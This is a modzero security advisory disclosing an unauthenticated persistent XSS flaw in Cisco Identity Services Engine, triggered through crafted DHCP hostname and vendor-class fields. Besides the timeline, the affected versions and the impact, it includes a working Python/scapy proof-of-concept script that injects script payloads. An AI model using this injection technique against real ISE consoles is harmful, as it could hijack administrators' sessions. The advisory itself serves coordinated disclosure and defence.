[MZ-19-03] Persistent XSS in CISCO ISE

ID: MZ-19-03

Release: February 19, 2020

Credits: Max Moser & Katharina Männle

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176


----------------------------------------------------[MZ-19-03]----v1.2--

modzero Security Advisory:

Unauthenticated persistent cross-site scripting injection into the
administrative console of CISCO ISE web application via DHCP request

------------------------------------------------------------------------

------------------------------------------------------------------------

1. Timeline

------------------------------------------------------------------------

* 2019-11-22: Advisory sent to Cisco PSIRT psirt@cisco.com
* 2019-11-22: PSIRT opened case (PSIRT-0535851956)
* 2019-11-22: PSIRT communicated tentative publishing date '2020-02-19'
* 2020-02-12: PSIRT incident manager confirmed reproduceability
* 2020-02-12: Received an unofficial CVE Number CVE-2020-3156
* 2020-02-19: modzero released advisory to the public

In  accordance  with  modzero's  disclosure  policy,  the  advisory  is
expected  to  be published  not  later than  February  21st, 2020.  Our
disclosure policy is available at:

https://www.modzero.ch/static/modzero_Disclosure_Policy.pdf

------------------------------------------------------------------------

2. About

------------------------------------------------------------------------

Affected vendor: Cisco
Latest known to be vulnerable version products:
    * Cisco Identity Services Engine version 2.6.0.156, Patch 2,3
      - Product Identifier: SNS-3655-K9
      - Version Identifier A0
      - ADE-OS Version 3.0.5.144

The Cisco Identity Services Engine is the engine behind Cisco's Network
Access Control  solution. It  enables the  creation and  enforcement of
security and access policies for endpoint devices connected to the
company's routers and switches.

------------------------------------------------------------------------

3. Details

------------------------------------------------------------------------

An unauthenticated attacker who is  able to inject a specially  crafted
DHCP  request  packet into  the  network controlled  by  Cisco Identify
Service  Engine  (ISE),  is  able to  persistently  store  code  (e. g.
JavaScript),  which  is  executed in  the  context  of the  Web-browser
accessing the Web-based management interface.

The vulnerability is due to insufficient validation and encoding of the
attacker-controllable  input  within  the  hostname  and  vendor  class
identifier field of processed DHCP request packets.

The attacker-controlled  code will  be executed  in the  context of the
user  of the  Web-based management  console. If  a legitimate  user is
reviewing  an  Endpoint's  attributes  within  the  Identity   Services
Engine's Web- based-management-interface.

The attacker-controlled  code will  be executed  in the  context of the
user that is currently logged  in to the Web-based management  console,
when  the  endpoint  attribute  details  are  reviewed  by  opening the
following
URL:

https://ISESRV/admin/login.jsp#context_dir/context_dir_devices/endpointDetails

------------------------------------------------------------------------

4. Impact

------------------------------------------------------------------------

The code will be executed with the rights of the user accessing the Web-
based management console. If the user has administrative rights, the
attacker might be able to leverage arbitrary functions of the Web-based
management interface.

------------------------------------------------------------------------

5. Proof of Concept exploit

------------------------------------------------------------------------

Using the following python script, two simple JavaScript code fragments
will be sent in the hostname and vendor class identifier fields of the
DHCP request.

#!/usr/bin/env python

from scapy.all import *
import scapy

conf.iface = "eth0"
hostname_payload = "<script>alert('hostname payload')</script>"
vendor_class_id_payload = "<script>alert('v class id payload')</script>"

_, hw   = get_if_raw_hwaddr(conf.iface)
ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=hw, type=0x800)
ip       = IP(src ='0.0.0.0', dst='255.255.255.255')
udp      = UDP (sport=68, dport=67)
bootp    = BOOTP(op=1, chaddr=hw)
dhcp     = DHCP(options=[("message-type","request"), \
    ("hostname",hostname_payload),("vendor_class_id", \
    vendor_class_id_payload),('end')])

packet   = ethernet / ip / udp / bootp / dhcp

sendp(packet, iface=conf.iface)

Once a person reviews the attributes of an endpoint within the ISE web-
based management interface the code will be executed.

------------------------------------------------------------------------

6. Workaround

------------------------------------------------------------------------

-

------------------------------------------------------------------------

7. Fix

------------------------------------------------------------------------

No software updates are available yet.

------------------------------------------------------------------------

8. Credits

------------------------------------------------------------------------

 * Max Moser
 * Katharina Maennle

------------------------------------------------------------------------

9. About modzero

------------------------------------------------------------------------

The independent company modzero assists clients with security  analysis
in  the  complex areas   of  computer technology.  The  focus  lies  on
highly   detailed   technical  analysis   of   concepts,  software  and
hardware  components  as  well   as  the  development  of    individual
solutions.  Colleagues   at modzero  work   exclusively in   practical,
highly technical computer-security areas and can draw on decades of
experience in various platforms, system concepts, and designs.

Website: https://www.modzero.ch
E-Mail: contact@modzero.ch

------------------------------------------------------------------------

10. Disclaimer

------------------------------------------------------------------------

The information in the advisory is believed to be accurate at the time
of publishing  based on  currently available  information. Use  of the
information  constitutes acceptance  for use  in an  AS IS  condition.
There are no warranties with  regard to this information. Neither  the
author  nor  the  publisher  accepts  any  liability  for  any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

Other News

PLAYGROUND

Tutorial: How we learned to love the doc(umentation)

October 14, 2024

Just read documentation to get RCE?! Our colleague Theresa designed a tutorial guiding you through an OpenVPN exploit scenario — for you to try at home!

DISCLOSURE

Beyond the @ Symbol: Exploiting the Flexibility of Email Addresses For Offensive Purposes

June 7, 2024

We exploited an unauthenticated command injection within the spam filter appliance MailCleaner that can be triggered through a malicious email address.

All news ⟶

[MZ-19-03] Persistent XSS in CISCO ISE

Other News

Tutorial: How we learned to love the doc(umentation)

Beyond the @ Symbol: Exploiting the Flexibility of Email Addresses For Offensive Purposes